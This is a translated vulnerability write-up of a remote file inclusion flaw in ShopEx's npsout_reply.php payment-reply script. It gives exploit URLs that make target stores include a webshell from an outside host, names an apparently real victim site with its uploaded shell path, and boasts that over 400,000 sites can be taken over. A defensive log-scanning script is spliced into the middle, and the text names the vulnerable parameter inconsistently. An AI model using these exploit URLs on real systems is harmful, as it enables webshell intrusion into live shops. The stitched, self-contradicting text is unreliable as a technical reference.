Vulnerability platform: SHOPEX
Harm degree: ★★★★☆
About Shopex:
Shopex is a comprehensive provider of online shopping software and technical services. As a pioneer and practitioner of domestic shopping software, it offers everything from the shopping software itself (online store, online shopping mall, online store multi-store system) to the supporting services (shop promotion, template design, traffic monitoring, business intelligence analysis, online payment, shop interconnection, shopping system custom development, etc.), as well as in-depth e-commerce technology services.
The principle of vulnerability:
Look at /shop/npsout_reply.php:

<?php
include_once($INC_SYSHOMEDIR."include/payfunction.php");

// ========================== merchant return information ==========================
// receive the payment component's encrypted data
$OrderInfo = $_POST['ordermessage'];   // encrypted order information
$SIGNMSG   = $_POST['Digest'];         // signature (digest)
$m_id      = $_POST['m_id'];

// ========================== start decryption ==========================
// check the signature
$shopPayment = newclass("shoppayment");
$key    = $shopPayment->getkey($INC_SHOPID, $m_id, "nps_out");
$digest = md5($OrderInfo.$key);
var_dump($_POST);
if ($digest == $SIGNMSG)
{
    // restore hex to characters
    $OrderInfo = hextostr($OrderInfo);
    // DES decryption
    $recovered_message = des($key, $OrderInfo, 0, 1, NULL);
    echo "DES Test decrypted: ".$recovered_message;
    $orderArray = split('[|]', $recovered_message);
    $m_id        = $orderArray[0];
    $m_orderid   = $orderArray[1];
    $m_oamount   = $orderArray[2];
    $m_ocurrency = $orderArray[3];
    $m_url       = $orderArray[4];
    //$m_txcode  = $orderArray[5];
    $m_language  = $orderArray[5];
    $s_name      = $orderArray[6];
    $s_addr      = $orderArray[7];
    $s_postcode  = $orderArray[8];
    $s_tel       = $orderArray[9];
    $s_eml       = $orderArray[10];
    $r_name      = $orderArray[11];
    $r_addr      = $orderArray[12];
    $r_postcode  = $orderArray[13];
    $r_tel       = $orderArray[14];
    $r_eml       = $orderArray[15];
    $m_ocomment  = $orderArray[16];
    $modate      = $orderArray[17];
    $Status      = $orderArray[18];
    if ($Status == 2)
    {
        $Order = newclass("Order");
        $Order->shopid = $INC_SHOPID;
        $Order->payid  = $m_orderid;
        $arr_paytime = getunixtime();   // payment time
        $Order->onlinepayed($arr_paytime[0], $arr_paytime[1]);
        $tmp_orderno = $Order->getorderidbypayid($Order->payid);   // fetch the store's order number
        $state   = 2;
        $strinfo = $PROG_TAGS["ptag_1334"];
    }
    else {
        $state   = 1;
        $strinfo = $PROG_TAGS["ptag_1335"];
    }
} else {
    $state   = 0;
    $strinfo = $PROG_TAGS["ptag_1336"];
}
header("Location:./index.php?goo=pay_reply.dwt&orderid=".$tmp_orderno."&state=".$state."&strinfo=".urlencode($strinfo));
?>
Suppose the web root of http://www.sagi.net.cn contains an include folder holding a payfunction.php file (this is our own construction; of course the file's contents can be a small shell or a big one, heh).
We can then use a request like the following: http://www.xxxx.com/shop/npsout_reply.php?INC_SYSHOMEDIR=http://www.sagi.net.cn
Simply put, a remote attacker can exploit this vulnerability to execute arbitrary PHP code with the web server process's privileges. Specifically, the 'npsout_reply.php' script does not filter the user-submitted 'npsout_root_path' parameter, so any file on a remote server can be specified as the include target, which causes arbitrary PHP code to execute with web server permissions.
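As an added example (not part of the original write-up or of ShopEx's code), here is a small Python access-log check that flags requests to npsout_reply.php whose INC_SYSHOMEDIR parameter carries a URL or PHP stream-wrapper scheme, which is exactly the condition that turns the include above into remote code execution. The log lines and the attacker.example host are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache combined format; all hosts and addresses are placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2024:10:01:02 +0000] "GET /shop/npsout_reply.php?INC_SYSHOMEDIR=http://attacker.example/php.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.6 - - [12/Mar/2024:10:01:03 +0000] "GET /shop/index.php?goo=pay_reply.dwt&orderid=42&state=2 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:01:04 +0000] "GET /shop/npsout_reply.php?inc_syshomedir=ftp%3A%2F%2Fattacker.example%2F HTTP/1.1" 200 512 "-" "curl/8.0"
203.0.113.8 - - [12/Mar/2024:10:01:05 +0000] "POST /shop/npsout_reply.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# Minimal combined-log parser: client address, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Schemes PHP's include() will resolve remotely (or as a stream wrapper) when URL includes are enabled.
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftps?|php|data|phar|expect)\s*:', re.IGNORECASE)


def find_rfi_attempts(log_text, script="/shop/npsout_reply.php", param="inc_syshomedir"):
    """Return one dict per request whose include-path parameter points at a remote scheme."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # The script may live under an arbitrary prefix (e.g. /oicqshop/shop/...).
        if not parts.path.lower().endswith(script):
            continue
        # keep_blank_values so an empty value still shows up as a probe.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # PHP variable names are case-sensitive, but match the name case-insensitively
            # so both spellings seen in the wild (INC_SYSHOMEDIR / inc_syshomedir) are caught.
            if name.lower() == param and REMOTE_SCHEME_RE.match(value):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "param": name,
                    "value": value,
                    "status": int(m.group("status")),
                })
    return hits


if __name__ == "__main__":
    for hit in find_rfi_attempts(SAMPLE_LOG):
        print("RFI attempt from {ip} at {time}: {param}={value} (HTTP {status})".format(**hit))
```

The request-supplied variable only reaches include_once() on hosts where PHP maps query parameters onto globals (register_globals) and allows URL includes; the check above is pure detection over access logs and does not depend on either setting.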
Exploit combat:
Construct URL:
Http://www.xxxx.com/shop/npsout_reply.php?INC_SYSHOMEDIR=http://www.sagi.net.cn/php.txt?
Note:
[http://www.sagi.net.cn/php.txt?] is not actually executed on the server hosting http://www.sagi.net.cn, but on "http://www.xxxx.com".
To put it simply: through the Shopex system, I had code hosted on a U.S. server executed on a Chinese server. The code belongs to the U.S. server, but it runs on the Chinese server.
So I issue the command on the Chinese server, and the U.S. server's code carries out its task obediently. It's as simple as that.
Vulnerability Experiment:
More than 400,000 sites using this system can be found. That means more than 400,000 sites can be compromised.
After the target site's address, append: /shop/npsout_reply.php?inc_syshomedir=http://www.sagi.net.cn/php.txt?
The remotely included PHP big shell's page then appears.
For example: Http://www.oicqshop.com/oicqshop/shop/npsout_reply.php?INC_SYSHOMEDIR=http://www.sagi.net.cn/php.txt?
Then upload the PHP big shell, and that's it.
Visit it, for example: http://www.oicqshop.com/oicqshop/shop/bsthacker.php
As for a fix, the vendor has not published one.
You can delete the npsout_reply.php file in the shop directory.